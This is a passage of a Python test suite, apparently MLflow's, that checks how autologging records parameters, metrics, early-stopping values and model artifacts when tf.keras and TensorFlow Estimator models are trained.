import mlflow.keras
from mlflow.utils.autologging_utils import BatchMetricsLogger, autologging_is_disabled
from unittest.mock import patch
import os
# Fix the RNG seed so the data fixtures are reproducible across test runs.
np.random.seed(1337)

# Bundle describing a saved model artifact plus data to validate it with.
SavedModelInfo = collections.namedtuple(
    "SavedModelInfo",
    ["path", "meta_graph_tags", "signature_def_key", "inference_df", "expected_results_df"],
)
@pytest.fixture(autouse=True)
def clear_session():
    # Run the test first, then reset Keras global state between tests.
    yield
    tf.keras.backend.clear_session()


@pytest.fixture
def random_train_data():
    """150 random feature rows with 4 columns each."""
    return np.random.random((150, 4))


@pytest.fixture
def random_one_hot_labels():
    """150 random one-hot label rows over 3 classes."""
    n, n_class = (150, 3)
    classes = np.random.randint(0, n_class, n)
    labels = np.zeros((n, n_class))
    labels[np.arange(n), classes] = 1
    return labels
@pytest.fixture
def clear_tf_keras_imports():
    """
    Simulates a state where `tensorflow` and `keras` are not imported by removing these
    libraries from the `sys.modules` dictionary. This is useful for testing the interaction
    between TensorFlow / Keras and the fluent `mlflow.autolog()` API because it will cause import
    hooks to be re-triggered upon re-import after `mlflow.autolog()` is enabled.
    """
    sys.modules.pop("tensorflow", None)
    sys.modules.pop("keras", None)


@pytest.fixture(autouse=True)
def clear_fluent_autologging_import_hooks():
    """
    Clears import hooks for MLflow fluent autologging (`mlflow.autolog()`) between tests
    to ensure that interactions between fluent autologging and TensorFlow / tf.keras can
    be tested successfully
    """
    mlflow.utils.import_hooks._post_import_hooks.pop("tensorflow", None)
    mlflow.utils.import_hooks._post_import_hooks.pop("keras", None)
def create_tf_keras_model():
    """Build a small compiled dense classifier (4 features -> 3 classes)."""
    model = tf.keras.Sequential()
    model.add(layers.Dense(16, activation="relu", input_shape=(4,)))
    model.add(layers.Dense(3, activation="softmax"))
    model.compile(
        optimizer=tf.keras.optimizers.Adam(), loss="categorical_crossentropy", metrics=["accuracy"]
    )
    return model
@pytest.mark.large
def test_tf_keras_autolog_ends_auto_created_run(random_train_data, random_one_hot_labels):
    # Autologging should close the run it implicitly opened for fit().
    mlflow.tensorflow.autolog()

    data = random_train_data
    labels = random_one_hot_labels

    model = create_tf_keras_model()
    model.fit(data, labels, epochs=10)

    assert mlflow.active_run() is None


@pytest.mark.large
@pytest.mark.parametrize("log_models", [True, False])
def test_tf_keras_autolog_log_models_configuration(
    random_train_data, random_one_hot_labels, log_models
):
    # pylint: disable=unused-argument
    mlflow.tensorflow.autolog(log_models=log_models)

    data = random_train_data
    labels = random_one_hot_labels

    model = create_tf_keras_model()
    model.fit(data, labels, epochs=10)

    client = mlflow.tracking.MlflowClient()
    run_id = client.list_run_infos(experiment_id="0")[0].run_id
    artifacts = client.list_artifacts(run_id)
    artifacts = map(lambda x: x.path, artifacts)
    # A "model" artifact must exist iff log_models was enabled.
    assert ("model" in artifacts) == log_models


@pytest.mark.large
def test_tf_keras_autolog_persists_manually_created_run(random_train_data, random_one_hot_labels):
    mlflow.tensorflow.autolog()

    with mlflow.start_run() as run:
        data = random_train_data
        labels = random_one_hot_labels

        model = create_tf_keras_model()
        model.fit(data, labels, epochs=10)

        # The user-opened run must survive fit() and remain active.
        assert mlflow.active_run()
        assert mlflow.active_run().info.run_id == run.info.run_id
@pytest.fixture
def tf_keras_random_data_run(random_train_data, random_one_hot_labels, initial_epoch):
    """Train a small model under autologging; return (run, fit history)."""
    # pylint: disable=unused-argument
    mlflow.tensorflow.autolog()

    data = random_train_data
    labels = random_one_hot_labels

    model = create_tf_keras_model()
    history = model.fit(
        data, labels, epochs=initial_epoch + 10, steps_per_epoch=1, initial_epoch=initial_epoch
    )

    client = mlflow.tracking.MlflowClient()
    return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_logs_expected_data(tf_keras_random_data_run):
    """Verify params, metrics and artifacts logged by tf.keras autologging."""
    run, history = tf_keras_random_data_run
    data = run.data
    assert "accuracy" in data.metrics
    assert "loss" in data.metrics
    # Testing explicitly passed parameters are logged correctly
    assert "epochs" in data.params
    assert data.params["epochs"] == str(history.epoch[-1] + 1)
    assert "steps_per_epoch" in data.params
    assert data.params["steps_per_epoch"] == "1"
    # Testing default parameters are logged correctly
    assert "initial_epoch" in data.params
    assert data.params["initial_epoch"] == str(history.epoch[0])
    # Testing unwanted parameters are not logged
    assert "callbacks" not in data.params
    assert "validation_data" not in data.params
    # Testing optimizer parameters are logged
    assert "opt_name" in data.params
    assert data.params["opt_name"] == "Adam"
    assert "opt_learning_rate" in data.params
    assert "opt_decay" in data.params
    assert "opt_beta_1" in data.params
    assert "opt_beta_2" in data.params
    assert "opt_epsilon" in data.params
    assert "opt_amsgrad" in data.params
    assert data.params["opt_amsgrad"] == "False"
    client = mlflow.tracking.MlflowClient()
    all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
    num_of_epochs = len(history.history["loss"])
    # One accuracy metric per epoch (fixture always trains 10 epochs).
    assert len(all_epoch_acc) == num_of_epochs == 10
    artifacts = client.list_artifacts(run.info.run_id)
    artifacts = map(lambda x: x.path, artifacts)
    assert "model_summary.txt" in artifacts
@pytest.mark.large
def test_tf_keras_autolog_records_metrics_for_last_epoch(random_train_data, random_one_hot_labels):
    every_n_iter = 5
    num_training_epochs = 17
    mlflow.tensorflow.autolog(every_n_iter=every_n_iter)

    model = create_tf_keras_model()
    with mlflow.start_run() as run:
        model.fit(
            random_train_data,
            random_one_hot_labels,
            epochs=num_training_epochs,
            initial_epoch=0,
        )

    client = mlflow.tracking.MlflowClient()
    run_metrics = client.get_run(run.info.run_id).data.metrics
    assert "accuracy" in run_metrics
    all_epoch_acc = client.get_metric_history(run.info.run_id, "accuracy")
    # Logged every 5 epochs over 17 epochs: steps 0, 5, 10, 15.
    assert set([metric.step for metric in all_epoch_acc]) == set([0, 5, 10, 15])


@pytest.mark.large
def test_tf_keras_autolog_logs_metrics_for_single_epoch_training(
    random_train_data, random_one_hot_labels
):
    """
    tf.Keras exhibits inconsistent epoch indexing behavior in comparison with other
    TF2 APIs (e.g., tf.Estimator). tf.Keras uses zero-indexing for epochs,
    while other APIs use one-indexing. Accordingly, this test verifies that metrics are
    produced in the boundary case where a model is trained for a single epoch, ensuring
    that we don't miss the zero index in the tf.Keras case.
    """
    mlflow.tensorflow.autolog(every_n_iter=5)

    model = create_tf_keras_model()
    with mlflow.start_run() as run:
        model.fit(random_train_data, random_one_hot_labels, epochs=1)

    client = mlflow.tracking.MlflowClient()
    run_metrics = client.get_run(run.info.run_id).data.metrics
    assert "accuracy" in run_metrics
    assert "loss" in run_metrics
@pytest.mark.large
def test_tf_keras_autolog_names_positional_parameters_correctly(
    random_train_data, random_one_hot_labels
):
    """Positional fit() args (here batch_size) must be logged under their names."""
    mlflow.tensorflow.autolog(every_n_iter=5)

    data = random_train_data
    labels = random_one_hot_labels

    model = create_tf_keras_model()
    with mlflow.start_run():
        # Pass `batch_size` as a positional argument for testing purposes
        model.fit(data, labels, 8, epochs=10, steps_per_epoch=1)
        run_id = mlflow.active_run().info.run_id

    client = mlflow.tracking.MlflowClient()
    run_info = client.get_run(run_id)
    assert run_info.data.params.get("batch_size") == "8"
@pytest.mark.large
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_model_can_load_from_artifact(tf_keras_random_data_run, random_train_data):
    """The autologged model artifact must be loadable and usable for predict()."""
    run, _ = tf_keras_random_data_run

    client = mlflow.tracking.MlflowClient()
    artifacts = client.list_artifacts(run.info.run_id)
    artifacts = map(lambda x: x.path, artifacts)
    assert "model" in artifacts
    assert "tensorboard_logs" in artifacts
    model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
    model.predict(random_train_data)
def get_tf_keras_random_data_run_with_callback(
    random_train_data,
    random_one_hot_labels,
    callback,
    restore_weights,
    patience,
    initial_epoch,
):
    """Train with an EarlyStopping or no-op callback; return (run, history, callback)."""
    # pylint: disable=unused-argument
    mlflow.tensorflow.autolog(every_n_iter=1)

    data = random_train_data
    labels = random_one_hot_labels

    model = create_tf_keras_model()
    if callback == "early":
        # min_delta is set as such to guarantee early stopping
        callback = tf.keras.callbacks.EarlyStopping(
            monitor="loss",
            patience=patience,
            min_delta=99999999,
            restore_best_weights=restore_weights,
            verbose=1,
        )
    else:

        class CustomCallback(tf.keras.callbacks.Callback):
            def on_train_end(self, logs=None):
                print("Training completed")

        callback = CustomCallback()

    history = model.fit(
        data, labels, epochs=initial_epoch + 10, callbacks=[callback], initial_epoch=initial_epoch
    )

    client = mlflow.tracking.MlflowClient()
    return client.get_run(client.list_run_infos(experiment_id="0")[0].run_id), history, callback
@pytest.fixture
def tf_keras_random_data_run_with_callback(
    random_train_data,
    random_one_hot_labels,
    callback,
    restore_weights,
    patience,
    initial_epoch,
):
    # Thin fixture wrapper so parametrized tests can share the helper above.
    return get_tf_keras_random_data_run_with_callback(
        random_train_data,
        random_one_hot_labels,
        callback,
        restore_weights,
        patience,
        initial_epoch,
    )
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_logs(tf_keras_random_data_run_with_callback, initial_epoch):
    """Verify EarlyStopping params/metrics and restored-epoch logging."""
    run, history, callback = tf_keras_random_data_run_with_callback
    metrics = run.data.metrics
    params = run.data.params
    assert "patience" in params
    assert params["patience"] == str(callback.patience)
    assert "monitor" in params
    assert params["monitor"] == "loss"
    assert "verbose" not in params
    assert "mode" not in params
    assert "stopped_epoch" in metrics
    assert "restored_epoch" in metrics
    restored_epoch = int(metrics["restored_epoch"])
    # In this test, the best epoch is always the first epoch because the early stopping callback
    # never observes a loss improvement due to an extremely large `min_delta` value
    assert restored_epoch == initial_epoch
    assert "loss" in history.history
    client = mlflow.tracking.MlflowClient()
    metric_history = client.get_metric_history(run.info.run_id, "loss")
    # Check that MLflow has logged the metrics of the "best" model, in addition to per-epoch metrics
    loss = history.history["loss"]
    assert len(metric_history) == len(loss) + 1
    steps, values = map(list, zip(*[(m.step, m.value) for m in metric_history]))
    # Check that MLflow has logged the correct steps
    assert steps == [*history.epoch, callback.stopped_epoch + 1]
    # Check that MLflow has logged the correct metric values
    np.testing.assert_allclose(values, [*loss, callback.best])
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [0, 1, 5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_batch_metrics_logger_logs_expected_metrics(
    callback,
    restore_weights,
    patience,
    initial_epoch,
    random_train_data,
    random_one_hot_labels,
):
    """Every metric stored on the run must flow through BatchMetricsLogger.record_metrics()."""
    patched_metrics_data = []

    # Mock patching BatchMetricsLogger.record_metrics()
    # to ensure that expected metrics are being logged.
    original = BatchMetricsLogger.record_metrics

    with patch(
        "mlflow.utils.autologging_utils.BatchMetricsLogger.record_metrics", autospec=True
    ) as record_metrics_mock:

        def record_metrics_side_effect(self, metrics, step=None):
            # Capture what was logged, then delegate to the real implementation
            # so the run still receives its metrics.
            patched_metrics_data.extend(metrics.items())
            original(self, metrics, step)

        record_metrics_mock.side_effect = record_metrics_side_effect
        run, _, callback = get_tf_keras_random_data_run_with_callback(
            random_train_data,
            random_one_hot_labels,
            callback,
            restore_weights,
            patience,
            initial_epoch,
        )

    patched_metrics_data = dict(patched_metrics_data)
    original_metrics = run.data.metrics
    # Every metric persisted on the run should also have passed through the logger.
    for metric_name in original_metrics:
        assert metric_name in patched_metrics_data

    restored_epoch = int(patched_metrics_data["restored_epoch"])
    assert restored_epoch == initial_epoch
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [True])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [11])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_stop_does_not_log(tf_keras_random_data_run_with_callback):
    """With patience (11) above the epoch count (10), no stop occurs and no stop metrics appear."""
    run, history, callback = tf_keras_random_data_run_with_callback
    metrics = run.data.metrics
    params = run.data.params
    assert "patience" in params
    assert params["patience"] == str(callback.patience)
    assert "monitor" in params
    assert params["monitor"] == "loss"
    assert "verbose" not in params
    assert "mode" not in params
    # Training ran to completion, so no stopped/restored epoch should be logged.
    assert "stopped_epoch" not in metrics
    assert "restored_epoch" not in metrics
    assert "loss" in history.history
    num_of_epochs = len(history.history["loss"])
    client = mlflow.tracking.MlflowClient()
    metric_history = client.get_metric_history(run.info.run_id, "loss")
    # Check the test epoch numbers are correct
    assert num_of_epochs == 10
    assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_early_stop_no_restore_doesnt_log(tf_keras_random_data_run_with_callback):
    """Without restore_best_weights, stopped_epoch is logged but restored_epoch is not."""
    run, history, callback = tf_keras_random_data_run_with_callback
    metrics = run.data.metrics
    params = run.data.params
    assert "patience" in params
    assert params["patience"] == str(callback.patience)
    assert "monitor" in params
    assert params["monitor"] == "loss"
    assert "verbose" not in params
    assert "mode" not in params
    assert "stopped_epoch" in metrics
    # restore_best_weights=False, so no restored epoch is recorded.
    assert "restored_epoch" not in metrics
    assert "loss" in history.history
    num_of_epochs = len(history.history["loss"])
    client = mlflow.tracking.MlflowClient()
    metric_history = client.get_metric_history(run.info.run_id, "loss")
    # Check the test epoch numbers are correct: the huge min_delta means no
    # improvement is ever seen, so training stops after `patience` + 1 epochs.
    assert num_of_epochs == callback.patience + 1
    assert len(metric_history) == num_of_epochs
@pytest.mark.large
@pytest.mark.parametrize("restore_weights", [False])
@pytest.mark.parametrize("callback", ["not-early"])
@pytest.mark.parametrize("patience", [5])
@pytest.mark.parametrize("initial_epoch", [0, 10])
def test_tf_keras_autolog_non_early_stop_callback_no_log(tf_keras_random_data_run_with_callback):
    """A non-EarlyStopping callback must produce no early-stop params or metrics at all."""
    # The callback itself is irrelevant here, so drop it from the fixture tuple.
    run, history = tf_keras_random_data_run_with_callback[:-1]
    metrics = run.data.metrics
    params = run.data.params
    assert "patience" not in params
    assert "monitor" not in params
    assert "verbose" not in params
    assert "mode" not in params
    assert "stopped_epoch" not in metrics
    assert "restored_epoch" not in metrics
    assert "loss" in history.history
    num_of_epochs = len(history.history["loss"])
    client = mlflow.tracking.MlflowClient()
    metric_history = client.get_metric_history(run.info.run_id, "loss")
    # Check the test epoch numbers are correct
    assert num_of_epochs == 10
    assert len(metric_history) == num_of_epochs
@pytest.mark.parametrize("positional", [True, False])
def test_tf_keras_autolog_does_not_mutate_original_callbacks_list(
    tmpdir, random_train_data, random_one_hot_labels, positional
):
    """
    Autologging injects its own callbacks into `fit()` / `fit_generator()` calls,
    appending them to any user-supplied ones. This test checks that the
    user-supplied callbacks list is left untouched (no permanent mutation),
    whether it is passed positionally or by keyword.
    """
    mlflow.tensorflow.autolog()

    user_tb_callback = tf.keras.callbacks.TensorBoard(log_dir=tmpdir)
    user_callbacks = [user_tb_callback]
    model = create_tf_keras_model()

    if positional:
        model.fit(random_train_data, random_one_hot_labels, None, 10, 1, user_callbacks)
    else:
        model.fit(random_train_data, random_one_hot_labels, epochs=10, callbacks=user_callbacks)

    assert len(user_callbacks) == 1
    assert user_callbacks == [user_tb_callback]
@pytest.mark.large
def test_tf_keras_autolog_does_not_delete_logging_directory_for_tensorboard_callback(
    tmpdir, random_train_data, random_one_hot_labels
):
    """A user-owned TensorBoard log directory must survive autologged training."""
    tb_log_dir = str(tmpdir.mkdir("tb_logs"))
    tb_callback = tf.keras.callbacks.TensorBoard(tb_log_dir, histogram_freq=0)

    mlflow.tensorflow.autolog()
    model = create_tf_keras_model()
    model.fit(random_train_data, random_one_hot_labels, epochs=10, callbacks=[tb_callback])

    # The directory belongs to the user, not to autologging — it must still exist.
    assert os.path.exists(tb_log_dir)
@pytest.mark.large
def test_tf_keras_autolog_logs_to_and_deletes_temporary_directory_when_tensorboard_callback_absent(
    tmpdir, random_train_data, random_one_hot_labels
):
    """When autologging creates its own temporary TensorBoard log dir, it cleans it up after training."""
    from unittest import mock
    from mlflow.tensorflow import _TensorBoardLogDir

    mlflow.tensorflow.autolog()

    # Substitute a log dir instance we control so its on-disk location can be
    # checked after training finishes.
    mock_log_dir_inst = _TensorBoardLogDir(location=str(tmpdir.mkdir("tb_logging")), is_temp=True)
    with mock.patch("mlflow.tensorflow._TensorBoardLogDir", autospec=True) as mock_log_dir_class:
        mock_log_dir_class.return_value = mock_log_dir_inst

        data = random_train_data
        labels = random_one_hot_labels
        model = create_tf_keras_model()
        model.fit(data, labels, epochs=10)

        # is_temp=True: the directory should have been deleted by autologging.
        assert not os.path.exists(mock_log_dir_inst.location)
def create_tf_estimator_model(directory, export, training_steps=100, use_v1_estimator=False):
    """Train a DNNClassifier on the bundled iris CSV dataset.

    :param directory: model_dir for the estimator (also the SavedModel export target).
    :param export: if True, export a SavedModel to `directory` after training.
    :param training_steps: number of training steps to run.
    :param use_v1_estimator: use the tf.compat.v1 estimator instead of the v2 one.
    """
    CSV_COLUMN_NAMES = ["SepalLength", "SepalWidth", "PetalLength", "PetalWidth", "Species"]
    train = pd.read_csv(
        os.path.join(os.path.dirname(__file__), "iris_training.csv"),
        names=CSV_COLUMN_NAMES,
        header=0,
    )
    # "Species" is the label column; the rest are features.
    train_y = train.pop("Species")

    def input_fn(features, labels, training=True, batch_size=256):
        """An input function for training or evaluating"""
        # Convert the inputs to a Dataset.
        dataset = tf.data.Dataset.from_tensor_slices((dict(features), labels))
        # Shuffle and repeat if you are in training mode.
        if training:
            dataset = dataset.shuffle(1000).repeat()
        return dataset.batch(batch_size)

    my_feature_columns = []
    for key in train.keys():
        my_feature_columns.append(tf.feature_column.numeric_column(key=key))

    feature_spec = {}
    for feature in CSV_COLUMN_NAMES:
        feature_spec[feature] = tf.Variable([], dtype=tf.float64, name=feature)
    receiver_fn = tf.estimator.export.build_raw_serving_input_receiver_fn(feature_spec)

    run_config = tf.estimator.RunConfig(
        # Emit loss metrics to TensorBoard every step
        save_summary_steps=1,
    )
    # If flag set to true, then use the v1 classifier that extends Estimator
    # If flag set to false, then use the v2 classifier that extends EstimatorV2
    if use_v1_estimator:
        classifier = tf.compat.v1.estimator.DNNClassifier(
            feature_columns=my_feature_columns,
            # Two hidden layers of 30 and 10 nodes.
            hidden_units=[30, 10],
            # The model must choose between 3 classes.
            n_classes=3,
            model_dir=directory,
            config=run_config,
        )
    else:
        classifier = tf.estimator.DNNClassifier(
            feature_columns=my_feature_columns,
            # Two hidden layers of 30 and 10 nodes.
            hidden_units=[30, 10],
            # The model must choose between 3 classes.
            n_classes=3,
            model_dir=directory,
            config=run_config,
        )

    classifier.train(input_fn=lambda: input_fn(train, train_y, training=True), steps=training_steps)
    if export:
        classifier.export_saved_model(directory, receiver_fn)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_ends_auto_created_run(tmpdir, export):
    """A run auto-created by autologging is ended once estimator training finishes."""
    model_dir = str(tmpdir.mkdir("test"))
    mlflow.tensorflow.autolog()
    create_tf_estimator_model(model_dir, export)
    assert mlflow.active_run() is None
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_persists_manually_created_run(tmpdir, export):
    """Training inside a user-created run must neither end nor replace that run."""
    model_dir = str(tmpdir.mkdir("test"))
    with mlflow.start_run() as run:
        create_tf_estimator_model(model_dir, export)
        active = mlflow.active_run()
        assert active
        assert active.info.run_id == run.info.run_id
@pytest.fixture
def tf_estimator_random_data_run(tmpdir, export):
    # pylint: disable=unused-argument
    """Train an estimator with autologging enabled and return the resulting MLflow run."""
    mlflow.tensorflow.autolog()
    create_tf_estimator_model(str(tmpdir.mkdir("test")), export)
    client = mlflow.tracking.MlflowClient()
    most_recent_run_info = client.list_run_infos(experiment_id="0")[0]
    return client.get_run(most_recent_run_info.run_id)
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
@pytest.mark.parametrize("use_v1_estimator", [True, False])
def test_tf_estimator_autolog_logs_metrics(tmpdir, export, use_v1_estimator):
    """Estimator training metrics are logged every `every_n_iter` steps."""
    directory = tmpdir.mkdir("test")
    mlflow.tensorflow.autolog(every_n_iter=5)

    with mlflow.start_run():
        create_tf_estimator_model(
            str(directory), export, use_v1_estimator=use_v1_estimator, training_steps=17
        )
        run_id = mlflow.active_run().info.run_id

    client = mlflow.tracking.MlflowClient()
    run = client.get_run(run_id)

    assert "loss" in run.data.metrics
    assert "steps" in run.data.params
    metrics = client.get_metric_history(run_id, "loss")
    # Estimator steps are one-indexed; logging every 5 steps over 17 training
    # steps yields entries at steps 1, 6, 11 and 16.
    assert set([metric.step for metric in metrics]) == set([1, 6, 11, 16])
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_v1_autolog_can_load_from_artifact(tmpdir, export):
    """A v1 estimator trained with autologging produces a loadable `model` artifact."""
    mlflow.tensorflow.autolog()
    create_tf_estimator_model(str(tmpdir.mkdir("test")), export, use_v1_estimator=True)

    client = mlflow.tracking.MlflowClient()
    latest_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)
    run_id = latest_run.info.run_id
    artifact_paths = [artifact.path for artifact in client.list_artifacts(run_id)]
    assert "model" in artifact_paths
    mlflow.tensorflow.load_model("runs:/" + run_id + "/model")
@pytest.mark.large
@pytest.mark.parametrize("export", [True, False])
def test_tf_estimator_autolog_logs_tensorboard_logs(tf_estimator_random_data_run):
    """TensorBoard event logs should be logged as a directory artifact on the run."""
    client = mlflow.tracking.MlflowClient()
    artifacts = client.list_artifacts(tf_estimator_random_data_run.info.run_id)
    # Generator expression instead of a temporary list: `any` can short-circuit
    # on the first match without materializing the whole sequence.
    assert any("tensorboard_logs" in a.path and a.is_dir for a in artifacts)
@pytest.mark.large
def test_tf_estimator_autolog_logs_metrics_in_exclusive_mode(tmpdir):
    """Exclusive-mode autologging still logs estimator params and per-step loss metrics."""
    mlflow.tensorflow.autolog(exclusive=True)

    # Pass a plain string path for consistency with the other estimator tests
    # (the original passed the py.path.local object directly).
    create_tf_estimator_model(str(tmpdir), export=False)
    client = mlflow.tracking.MlflowClient()
    tf_estimator_run = client.get_run(client.list_run_infos(experiment_id="0")[0].run_id)

    assert "loss" in tf_estimator_run.data.metrics
    assert "steps" in tf_estimator_run.data.params
    metrics = client.get_metric_history(tf_estimator_run.info.run_id, "loss")
    # Default training_steps=100 -> one logged loss entry per step.
    assert len(metrics) == 100
@pytest.mark.large
def test_tf_estimator_autolog_logs_metics_for_single_epoch_training(tmpdir):
    """
    Epoch indexing behavior is consistent across TensorFlow 2: tf.Keras uses
    zero-indexing for epochs, while other APIs (e.g., tf.Estimator) use one-indexing.
    This test verifies that metrics are produced for tf.Estimator training sessions
    in the boundary case where a model is trained for a single epoch, ensuring that
    we capture metrics from the first epoch at index 1.
    """
    mlflow.tensorflow.autolog()
    with mlflow.start_run() as run:
        create_tf_estimator_model(str(tmpdir), export=False, training_steps=1)
    client = mlflow.tracking.MlflowClient()
    metrics = client.get_metric_history(run.info.run_id, "loss")
    assert len(metrics) == 1
    # One-indexed: the single training step is logged at step 1, not 0.
    assert metrics[0].step == 1
@pytest.mark.large
@pytest.mark.parametrize("export", [True])
def test_tf_estimator_autolog_model_can_load_from_artifact(tf_estimator_random_data_run):
    """The autologged estimator model can be reloaded via its runs:/ URI."""
    run_id = tf_estimator_random_data_run.info.run_id
    client = mlflow.tracking.MlflowClient()
    artifact_paths = [artifact.path for artifact in client.list_artifacts(run_id)]
    assert "model" in artifact_paths
    mlflow.tensorflow.load_model("runs:/" + run_id + "/model")
@pytest.mark.large
def test_flush_queue_is_thread_safe():
    """
    Autologging augments TensorBoard event logging hooks with MLflow `log_metric` API
    calls. To prevent these API calls from blocking TensorBoard event logs, `log_metric`
    API calls are scheduled via `_flush_queue` on a background thread. Accordingly, this test
    verifies that `_flush_queue` is thread safe.
    """
    from threading import Thread
    from mlflow.entities import Metric
    from mlflow.tensorflow import _flush_queue, _metric_queue_lock

    client = mlflow.tracking.MlflowClient()
    run = client.create_run(experiment_id="0")
    metric_queue_item = (run.info.run_id, Metric("foo", 0.1, 100, 1))
    mlflow.tensorflow._metric_queue.append(metric_queue_item)

    # Verify that, if another thread holds a lock on the metric queue leveraged by
    # _flush_queue, _flush_queue terminates and does not modify the queue
    _metric_queue_lock.acquire()
    flush_thread1 = Thread(target=_flush_queue)
    flush_thread1.start()
    flush_thread1.join()
    assert len(mlflow.tensorflow._metric_queue) == 1
    assert mlflow.tensorflow._metric_queue[0] == metric_queue_item
    _metric_queue_lock.release()

    # Verify that, if no other thread holds a lock on the metric queue leveraged by
    # _flush_queue, _flush_queue flushes the queue as expected
    flush_thread2 = Thread(target=_flush_queue)
    flush_thread2.start()
    flush_thread2.join()
    assert len(mlflow.tensorflow._metric_queue) == 0
def get_text_vec_model(train_samples):
    """Build a small text model whose TextVectorization layer cannot be saved in H5 format."""
    # Taken from: https://github.com/mlflow/mlflow/issues/3910
    # pylint: disable=no-name-in-module
    from tensorflow.keras.layers.experimental.preprocessing import TextVectorization

    VOCAB_SIZE = 10
    SEQUENCE_LENGTH = 16
    EMBEDDING_DIM = 16

    vectorizer_layer = TextVectorization(
        input_shape=(1,),
        max_tokens=VOCAB_SIZE,
        output_mode="int",
        output_sequence_length=SEQUENCE_LENGTH,
    )
    # Fit the layer's vocabulary on the training samples before building the model.
    vectorizer_layer.adapt(train_samples)
    model = tf.keras.Sequential(
        [
            vectorizer_layer,
            tf.keras.layers.Embedding(
                VOCAB_SIZE,
                EMBEDDING_DIM,
                name="embedding",
                mask_zero=True,
                input_shape=(1,),
            ),
            tf.keras.layers.GlobalAveragePooling1D(),
            tf.keras.layers.Dense(16, activation="relu"),
            tf.keras.layers.Dense(1, activation="tanh"),
        ]
    )
    model.compile(optimizer="adam", loss="mse", metrics="mae")
    return model
@pytest.mark.skipif(
    Version(tf.__version__) < Version("2.3.0"),
    reason=(
        "Deserializing a model with `TextVectorization` and `Embedding`"
        "fails in tensorflow < 2.3.0. See this issue:"
        "https://github.com/tensorflow/tensorflow/issues/38250"
    ),
)
def test_autolog_text_vec_model(tmpdir):
    """
    Verifies autolog successfully saves a model that can't be saved in the H5 format
    """
    mlflow.tensorflow.autolog()

    train_samples = np.array(["this is an example", "another example"])
    train_labels = np.array([0.4, 0.2])
    model = get_text_vec_model(train_samples)

    # Saving in the H5 format should fail
    with pytest.raises(NotImplementedError, match="is not supported in h5"):
        model.save(tmpdir.join("model.h5").strpath, save_format="h5")

    with mlflow.start_run() as run:
        model.fit(train_samples, train_labels, epochs=1)

    loaded_model = mlflow.keras.load_model("runs:/" + run.info.run_id + "/model")
    # Round-trip check: the reloaded model must produce identical predictions.
    np.testing.assert_array_equal(loaded_model.predict(train_samples), model.predict(train_samples))
def test_fit_generator(random_train_data, random_one_hot_labels):
    """`fit_generator()` params and metrics are autologged just like `fit()`."""
    mlflow.tensorflow.autolog()
    model = create_tf_keras_model()

    def generator():
        # Endless stream of the same batch; steps_per_epoch bounds consumption.
        while True:
            yield random_train_data, random_one_hot_labels

    with mlflow.start_run() as run:
        model.fit_generator(generator(), epochs=10, steps_per_epoch=1)

    run = mlflow.tracking.MlflowClient().get_run(run.info.run_id)
    params = run.data.params
    metrics = run.data.metrics
    assert params.get("epochs") == "10"
    assert params.get("steps_per_epoch") == "1"
    assert "accuracy" in metrics
    assert "loss" in metrics
@pytest.mark.large
@pytest.mark.usefixtures("clear_tf_keras_imports")
def test_fluent_autolog_with_tf_keras_logs_expected_content(
    random_train_data, random_one_hot_labels
):
    """
    Guards against previously-exhibited issues where using the fluent `mlflow.autolog()` API with
    `tf.keras` Models did not work due to conflicting patches set by both the
    `mlflow.tensorflow.autolog()` and the `mlflow.keras.autolog()` APIs.
    """
    mlflow.autolog()
    model = create_tf_keras_model()

    with mlflow.start_run() as run:
        model.fit(random_train_data, random_one_hot_labels, epochs=10)

    client = mlflow.tracking.MlflowClient()
    run_data = client.get_run(run.info.run_id).data
    assert "accuracy" in run_data.metrics
    assert "epochs" in run_data.params

    artifacts = client.list_artifacts(run.info.run_id)
    # NOTE(review): `map` is a one-shot iterator — fine for this single membership
    # check, but it would misbehave if additional checks were added later.
    artifacts = map(lambda x: x.path, artifacts)
    assert "model" in artifacts
def test_callback_is_picklable():
    """The autologging callbacks must round-trip through pickle."""
    metrics_logger = BatchMetricsLogger(run_id="1234")
    keras_callback = __MLflowTfKeras2Callback(
        log_models=True, metrics_logger=metrics_logger, log_every_n_steps=5
    )
    pickle.dumps(keras_callback)
    pickle.dumps(_TensorBoard())
@pytest.mark.large
@pytest.mark.skipif(
    Version(tf.__version__) < Version("2.1.0"), reason="This test requires tensorflow >= 2.1.0"
)
def test_tf_keras_autolog_distributed_training(random_train_data, random_one_hot_labels):
    """Autologging also captures fit() params when training under MirroredStrategy."""
    # Ref: https://www.tensorflow.org/tutorials/distribute/keras
    mlflow.tensorflow.autolog()
    with tf.distribute.MirroredStrategy().scope():
        model = create_tf_keras_model()
    fit_params = {"epochs": 10, "batch_size": 10}
    with mlflow.start_run() as run:
        model.fit(random_train_data, random_one_hot_labels, **fit_params)
    client = mlflow.tracking.MlflowClient()
    # Dict-view `>=` (superset): every fit param must appear among the logged params.
    assert client.get_run(run.info.run_id).data.params.keys() >= fit_params.keys()
@pytest.mark.large
@pytest.mark.skipif(
